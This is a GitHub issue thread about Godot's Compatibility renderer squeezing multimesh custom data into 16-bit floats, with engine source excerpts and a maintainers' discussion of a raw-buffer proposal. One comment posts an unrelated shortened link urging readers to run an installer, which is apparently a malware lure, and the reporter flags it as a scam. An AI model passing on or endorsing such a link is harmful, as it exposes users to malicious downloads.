### ISSUE TITLE
It is impossible to accurately set multimesh custom data in compatibility renderer

### ISSUE THREAD

**Issue by FireCatMagic** [godotengine/godot#96503]
### Tested versions

Godot v4.4.dev unknown - Windows 10.0.19045 - GLES3 (Compatibility) - NVIDIA GeForce RTX 4050 Laptop GPU (NVIDIA; 32.0.15.6070) - 13th Gen Intel(R) Core(TM) i5-13500HX (20 Threads)
(this is 4.4-dev1 compiled with debug symbols)

### System information

Godot v4.4.dev unknown - Windows 10.0.19045 - GLES3 (Compatibility) - NVIDIA GeForce RTX 4050 Laptop GPU (NVIDIA; 32.0.15.6070) - 13th Gen Intel(R) Core(TM) i5-13500HX (20 Threads)

### Issue description

Multimesh's custom data allows you to store custom data to customize multimesh instances.
In the **vulkan** renderers, you get:
- 4 32-bit floats in a `Color` variant
- Easily stored in a `PackedFloat32Array`, it is simply [r, g, b, a]
 - Allows up to 128 bits of custom data

In **compatibility**, you get:
- 4 16-bit floats in a `Color` variant
 - Allows up to 64 bits of custom data

I tried to examine buffer myself to see how they were stored, but couldn't figure it out, so I went into the source code to try and figure it out.
    Via `godot/drivers/gles3/storage/mesh_storage.cpp`:
``` cpp
void MeshStorage::_multimesh_instance_set_custom_data(RID p_multimesh, int p_index, const Color &p_color) {
	MultiMesh *multimesh = multimesh_owner.get_or_null(p_multimesh);
	ERR_FAIL_NULL(multimesh);
	ERR_FAIL_INDEX(p_index, multimesh->instances);
	ERR_FAIL_COND(!multimesh->uses_custom_data);

	_multimesh_make_local(multimesh);

	{
		float *w = multimesh->data_cache.ptrw();

		float *dataptr = w + p_index * multimesh->stride_cache + multimesh->custom_data_offset_cache;
		uint16_t val[4] = { Math::make_half_float(p_color.r), Math::make_half_float(p_color.g), Math::make_half_float(p_color.b), Math::make_half_float(p_color.a) };
		memcpy(dataptr, val, 2 * 4);
	}

	_multimesh_mark_dirty(multimesh, p_index, false);
}
```

It seems simple enough. Four 16-bit floats are laid out consecutively in memory, which can then be copied directly into the buffer.
The multimesh buffer (atleast from what is exposed), uses a PackedFloat32Array.
When custom data is enabled, it allocates four indexes per custom data.
In compatibility, it should only use the first two out of the four indexes, while in Vulkan, it should use them all.

But that is where the issue lies - there is no way for us to directly modify the bits like we can in the Forward+ renderer.
We don't have access to the uint16 array of data, all data have stuff happen to it before we can input any raw data.

### Steps to reproduce

1. Use custom data in the MultiMesh custom data that relies on bit-specific values, which is very useful in my project as I can combine up to 64 bits/ 8 bytes of custom data into one single multimesh instance.
2. Notice that when used in Compatibility, unlike the Forward+ renderer this data gets messed up due to the conversions to 16-bit floating point numbers

### Minimal reproduction project (MRP)

I've set up two different example projects. The instance shown here is **four cubes in one single mesh**

**Project 1: Forward+ Renderer**
In this example, everything works exactly as it should, as it doesn't have any 16-bit-float bit-packing to do like in the Compatibility renderer.
![image](https://github.com/user-attachments/assets/28ca4460-b792-481b-9b72-b004137b78d7)
It effectively and easily allows the packing of 4 different colors into one MultiMesh custom data. This project serves as a functional example of what I am trying to do.
[MultimeshBitsForward.zip](https://github.com/user-attachments/files/16841847/MultimeshBitsForward.zip)

**Project 2: Compatibility Renderer**
Similar to the one above, but it only uses two colors.
![image](https://github.com/user-attachments/assets/62e045a7-7dd5-4bb0-b13d-5e64b392fe57)
No matter the input data, the data gets malformed and lost.

[MultimeshBitsCompatibility.zip](https://github.com/user-attachments/files/16841946/MultimeshBitsCompatibility.zip)

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by FireCatMagic** [comment]
> try this ////// select the desired compiler in the installer

![image](https://github.com/user-attachments/assets/9ef003d5-1c27-4cef-8ea5-7ba41216c226)
![image](https://github.com/user-attachments/assets/7f88d7fd-03b3-45fa-97d6-ffe6419f5b2c)

Can you not? this has nothing to do with godot and is probably a scam

**Comment by huwpascoe** [comment]
Probably can't write directly to the buffer, try modifying a local vector then submit the whole thing to the multimesh
```gdscript
var data := multimesh.buffer
data[12] = packed_colors[0]
data[13] = packed_colors[1]
multimesh.buffer = data
```

**Comment by FireCatMagic** [comment]
> Probably can't write directly to the buffer, try modifying a local vector then submit the whole thing to the multimesh
> 
> ```gdscript
> var data := multimesh.buffer
> data[12] = packed_colors[0]
> data[13] = packed_colors[1]
> multimesh.buffer = data
> ```

I thought this too when testing, but it doesnt seem to actually be the case:
![image](https://github.com/user-attachments/assets/94fbc647-c0d1-456b-9be0-dee21e4c99ca)
![image](https://github.com/user-attachments/assets/98bf3552-977b-4b02-a7b7-af75a3caee3a)

**Comment by huwpascoe** [comment]
Okay, here's what's going on.

```
transform3d:float32[12]
color:float32[4]
custom:float32[4]
```
The buffer stores the instance data as float32 regardless of the actual driver. So forward+ or compatible, the data is the same.

But in the case of the gles3 driver, when uploading to the GPU, it copies the buffer, compressing the color and custom components as float16.
https://github.com/godotengine/godot/blob/8120e0324a48190f58616378746d517e4ad40965/drivers/gles3/storage/mesh_storage.cpp#L1927-L1932

### Bad ending
The design has been chosen as an abstraction layer, and it's unlikely the rendering team will support a change to bypass that abstraction. This technically leaves only 11 bits of lossless data, integer range of [-2048, 2047] per rgba component for gles3 driver.

### Now what?
Depends on what you wanted to use the data for. I'll be happy to help find workarounds.

**Comment by huwpascoe** [comment]
If it's just the rendering server then I reckon that might be accepted, something like `multimesh_set_buffer_raw(RID, PackedByteArray)`. Please open a [proposal](https://github.com/godotengine/godot-proposals) if you wish to see this go further.

The block scale, can that be read from the transform matrix itself? (assuming they're axis aligned of course)

**Comment by clayjohn** [comment]
The limitation is that we ran out of vertex attributes in the compatibility renderer. Many OpenGL implementations are limited to 16 attributes. Our options were to:
1. Allow full floating point color and disable custom, or
2. Pack color and custom using 16 bit floats. 

We chose the latter. 

To be honest though, doing bit packing and unpacking hackery was never part of our intended use-case for custom. It has always been seen as a way to provide custom floating point data to the shader. You are using the system for something it was never intended to deal with. That isn't _wrong_ per se, but ultimately, you are suggesting that we change an existing system to accommodate something it was never designed to do.

**Comment by FireCatMagic** [comment]
> If it's just the rendering server then I reckon that might be accepted, something like `multimesh_set_buffer_raw(RID, PackedByteArray)`. Please open a [proposal](https://github.com/godotengine/godot-proposals) if you wish to see this go further.
> 
> The block scale, can that be read from the transform matrix itself? (assuming they're axis aligned of course)

Great point on my specific usecase, using MODEL_MATRIX in my shader instead of passing it, thank you, i'll look into it

> The limitation is that we ran out of vertex attributes in the compatibility renderer. Many OpenGL implementations are limited to 16 attributes. Our options were to:
> 
>     1. Allow full floating point color and disable custom, or
> 
>     2. Pack color and custom using 16 bit floats.
> 
> 
> We chose the latter.
> 
> To be honest though, doing bit packing and unpacking hackery was never part of our intended use-case for custom. It has always been seen as a way to provide custom floating point data to the shader. You are using the system for something it was never intended to deal with. That isn't _wrong_ per se, but ultimately, you are suggesting that we change an existing system to accommodate something it was never designed to do.

Understood. Would some sort of function to set the buffer raw like huwpascoe suggested for the RenderingServer be considered if I submitted it as a proposal? Or is the whole concept something that never would be added?

**Comment by clayjohn** [comment]
> Understood. Would some sort of function to set the buffer raw like huwpascoe suggested for the RenderingServer be considered if I submitted it as a proposal? Or is the whole concept something that never would be added?

I think that a raw byte buffer could be doable!

**Comment by FireCatMagic** [comment]
> > Understood. Would some sort of function to set the buffer raw like huwpascoe suggested for the RenderingServer be considered if I submitted it as a proposal? Or is the whole concept something that never would be added?
> 
> I think that a raw byte buffer could be doable!

I'll go ahead and close this now, I made a new proposal issue:
https://github.com/godotengine/godot-proposals/issues/10650
